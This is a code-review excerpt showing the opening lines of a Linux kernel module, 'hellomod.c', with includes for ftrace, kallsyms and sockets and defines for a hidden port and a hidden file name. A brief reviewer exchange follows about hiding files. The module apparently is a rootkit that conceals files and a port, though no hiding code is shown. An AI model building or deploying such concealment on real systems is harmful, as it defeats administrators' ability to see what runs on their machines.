hellomod.c

```diff
@@ -0,0 +1,65 @@
+#define MODULE
+#define LINUX
+#define __KERNEL__
+
+#include <linux/module.h>
+#include <linux/kernel.h>
+#include <linux/kallsyms.h>
+#include <linux/uaccess.h>
+#include <linux/unistd.h>
+#include <linux/slab.h>
+#include <linux/compiler.h>
+#include <linux/types.h>
+#include <linux/proc_fs.h>
+#include <linux/ftrace.h>
+#include <linux/socket.h>
+#include <net/sock.h>
+#include <linux/trace.h>
+#include <linux/seq_file.h>
+
+#define HIDDEN_PORT 8080
+#define HIDDEN_FILE_NAME "myfile"
```

Comment:
so are you hiding every file in the system that's named `myfile`?

Reply:
now you can also set FILE_DIR